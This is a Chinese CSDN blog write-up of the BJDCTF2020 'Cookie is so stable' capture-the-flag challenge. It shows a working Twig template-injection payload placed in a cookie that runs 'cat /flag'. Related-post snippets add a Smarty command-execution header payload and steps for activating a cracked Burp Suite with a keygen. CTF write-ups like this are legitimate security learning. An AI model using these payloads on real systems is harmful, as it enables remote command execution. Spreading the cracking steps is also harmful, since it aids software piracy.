BJDCTF2020 Cookie is so stable

最新推荐文章于 2024-07-22 17:19:45 发布
最新推荐文章于 2024-07-22 17:19:45 发布
阅读量154 收藏 1
点赞数
分类专栏: CTF 文章标签: cookie 网络安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45619909/article/details/115598141
版权

打开靶机

左点右点没啥头绪,看了wp说是ssti注入。那我们在flag页面输入{{4*4}}试一下。

的确存在ssti注入,但在flag页面payload不行,因为提示了cookie,cookie里存储了值,在这个页面会被拦截。那就抓包改cookie吧。在F12也能改,但在我这貌似出了点问题,还是老老实实抓包吧。抓包后在cookie里加入

user:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

得到flag,ssti模板注入不太懂,长见识了。

Tajang
关注
专栏目录
[BJDCTF2020]Cookie is so stable 1(twig模板注入)
weixin_45577185的博客
09-06 378
详解模板注入漏洞 关于SSTI注入的一些理解 抓个包: 发现了两个包在cookie上的不同 判断是twig,经过测试发现是ssti注入 Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 注释:如果不抓包在页面是无法获得flag的,应该有过滤 ...
【学习笔记 42】 buu [BJDCTF2020]Cookie is so stable
weixin_43553654的博客
08-02 374
0x00 知识点 Twig模板注入 0x01 知识点详解 什么是Twig模板注入? 答:这里推荐一位大佬的文章,看看人家的博客,才是真的强。 https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之SSTI漏洞/#2-Twig 0x02 解题思路 什么都没有,点开flag 发现是个登录界面,尝试经典{{7*7}}后判断是Twig模板注入 再hint页面查看源码 发现提示指向了cookie,再flag页面登录的时候抓包分析。 推测出cookie里的user参数就是
[BJDCTF2020]Cookie is so stable
05-12 117
1 打开网站之后看到 可以看到里面有一个Flag和一个Hint,打开Flag是一个输入框 可能是sql注入或者rce之类的攻击, Hint没有什么内容,查看源码发现里面有提示,让我们看一下cookies,那我们回到flag去看一下cookie 现在只有两条cookie,我们再输入框中输入一些内容,然后提交试试 可以发现,多了一条cookie,这条就是我们输入的内容,已经试过没有sql注入点,也不能执行远程命令。 网上一查才知道是一个模板注入。 可以在输入框输入{{7*‘7’}}测试是那个模板,
[BJDCTF2020]Cookie is so stable1
m0_73673698的博客
06-13 611
如果是Jinja2的话输出应该是输出22,为什么输出22呢,'2'在python中被看作是字符串,在python中一个字符串乘上一个数字,就是将这个字符串连续输出,看下面演示。这里是Twig1.x版本(但是怎么确定是1.x版本的我没有弄明白,因此下面的payload也只适用于Twig1.x版本)最终我们的payload为。提示看一下cookie,我们在flag.php页面抓包可以看到cookie中是存在一个user参数的。确定是ssti注入,那么接下来就是确定是哪个模板了,上图。打开题目,看到如下页面。
BUUCTF [BJDCTF2020]Cookie is so stable
weixin_73399382的博客
07-22 389
这道题先点了一下没发现什么get参数,dirsearch和githack都扫了一下没啥收获,后面在hint源码中发现一行注释让我们仔细看cookie又回去在flag页面随便输个名字(只有这里有操作的地方),看到发了两个数据包,post方式包里面带两个请求体参数,不过cookie没有什么异常get型数据包里面发现多了一个参数usercookie一般存在什么问题,伪造身份,注入?这里伪造身份肯定不存在,那就只能注入了,但是有个问题是我们输入的数据被当做数据打印出来了,那就没法sql注入。
[BJDCTF2020]Cookie is so stable 模板注入SSTI
m0_64180167的博客
09-19 225
这个题目已经在提示我们了然后我们去hint看看让我们看看cookie 那我们肯定直接抓包啊cookie中存在 回显值 但是我觉得一眼看上去就不是sql注入 因为是我们提交东西 而且没有查询的东西所以我们可以想到是不是其他注入 于是就思考到是不是模板注入。
web buuctf [BJDCTF2020]Cookie is so stable
weixin_44214568的博客
03-31 563
1. 2.查看hint页面源代码,提示关键在cookie 3.用admin登录,之后刷新抓包,发现cookie: UM_distinctid=17df970999f4d4-04704e6be3f571-4c3e207f-e1000-17df97099a05d4; PHPSESSID=c8ca1d92349dffef8879d35029b3eeb0; user=admin 第一个是友盟的,主要看cookie中的user 4.cookie中的注入,我第一个想法就是ssti(模板注入) paylo
BUUCTF [BJDCTF2020] Cookie is so stable
Senimo
01-03 494
BUUCTF [BJDCTF2020] Cookie is so stable 考点: Twig模版注入 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 首先启动环境: 其中导航栏包括Flag和Hint页面,依次点击查看,首先是Hint页面: 查看网页源码,得到: <h3>Welcome to BJDCTF 2020.Happy Game!</h3>
【BUUCTF】[BJDCTF2020]Cookie is so stable
aoao331198的博客
04-30 265
flag页面比较容易看出来存在SSTI 看见有wp说是Twig模板注入,copy一下判断方法 尝试{{7*7}}, 返回49 尝试{{7*‘7’}},返回49,说明是Twig模板,但是如果返回7777777,则说明是Jinia2模板 不同的模板的攻击方式不同,贴一个好文章 一篇文章带你理解漏洞之 SSTI 漏洞 用PL {{_self.env.registerUndefinedFilterCallback("exec")}} {{_self.env.getFilter("id")}} 但是在输入框.
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
[ctf web]SSTI PHP的模板注入SSTI (smarty+Twig) 以及[BJDCTF2020]Cookie is so stable
ShenZ的博客
08-30 3631
PHP的模板注入 如果是在cookie处执行,最好抓包打payload,可能有url编码的问题 smarty模板注入 控制XFF进行命令执行(这是要在前端有IP相关回显的情况) payload: X-Forwarded-For: {{system("ls")}} 利用 {$smarty.version} //smarty的版本号 标签 {php} 可以使用{php}{/php}标签来执行被包裹其中的php指令 {php}phpinfo();{/php} Smarty已经废弃{php}标签,
Burpsuite2020.12.1最新版蓝色款
Tajang的大千世界
12-22 9389
最新版Burpsuite下载破解安装 安装包链接:https://cloud.189.cn/t/qUVzYbuAJzqm(访问码:mw12) 1.首先,我们解压,可以看到解压后的文件夹里有如下文件 2.双击BURP.cmd,打开后需要输入key 3.我们打开BurpSuite KeyGen By Uncia.jar,将lisense里的码复制到刚才的burpsuite里 将lisense复制到burpsuite里点击next 4.我们可以看到下图: 5.点击Manual activation,显示下图: 6
首届安徽省“追日杯”大学生网络安全挑战赛WriteUp
Tajang的大千世界
12-09 4874
第六,应该能混个三等奖 题量很大,打的人少,很多题都是0解,Reverse全0解,其他方向大都是个位数,综合渗透那里,题特别多,做了一个第一题就没做了,也挺难的,但是分还很低。怪怪的。 Web gotofly 题目一直重定向,即使到了flag页面,立即刷新也看不见,BP直接抓包,一页一页翻就行了 Misc chess 半自动化脚本 # -- coding=utf8 -- from pwn import * io=remote("ctf.zrb.edisec.net",33741) win_data='
蓝帽杯2021 One Pointer PHP
Tajang的大千世界
11-23 3879
第一次打FPM/FastCGI的题,实际上也是第一次接触打中间件的题,刚开始是在陇原战“疫”碰到了一道类似的题,也是改编的这道,为了更好地复现这道题,理解这道题,我去把Fastcgi 协议分析与 PHP-FPM 攻击方法都看了几遍。攻击的实操部分,本来想着复现,但那个鬼环境一直差点意思。这里不得不提中国网安界大神——phith0n,P神开创的vulhub确实帮了国内外网络安全学习者的大忙,让安全研究者更加专注于漏洞原理本身,而不是忙于搭建复杂的漏洞环境。但不幸的事,这个洞的环境坏了,问了P神说官网要下架,让
[WUSTCTF2020]颜值成绩查询
Tajang的大千世界
11-19 3842
经过测试,我们可以发现输入一到4都是有回显的,虽然后面几个是乱码,比如名字和分数怪怪的。但是还是有固定英文的,比如Hi,your score is: 后面的测试就很明显了,输入其他字符报错,无报错回显,摆明了布尔注入。所以我们需要构造一个验证正确与否的语句,用于判断字母,这里先介绍一下异或注入 异或注入,是在 SQL 注入中,利用 Mysql 对异或逻辑的处理特性,帮助进行 SQL 注入的利用,作用包括但不限于绕过敏感词过滤、判断过滤内容和直接进行盲注利用。 在 Mysql 中,异或操作的两个关键词是 “
利用PHP垃圾回收机制构造POP链
Tajang的大千世界
02-07 3298
一个小trick
第十五届全国大学生信息安全竞赛部分WriteUp
Tajang的大千世界
05-30 2682
CTF高考
内涵的软件
Tajang的大千世界
04-24 1564
软件先打开运行一下,发现没什么用。就用exe info pe查壳 32位的,那就用IDA32打开。 去main0里看看 直接给了,那就包上flag就行 flag{49d3c93df25caad81232130f3d2ebfad} 这题类似于BUU第一题,感觉没第二第三难,第二第三好歹要读伪代码和转化字符,这题和第一题直接IDA就没啥难度了。第一篇逆向wp,我应该先写前面几题wp的,但前面的学长指导过,不是独立写出来的。算是小入门了吧,希望在Reverse上有所造诣! ...
cookie is nil
最新发布
07-27
当你在编程中遇到 "cookie is nil" 的情况,通常意味着某个变量 `cookie` 被设置成了 `null` 或者空值,在许多编程语言中,包括JavaScript,它是一个表示未初始化、不存在或者已被删除的对象引用。当尝试访问这样一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tajang

感谢投喂

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值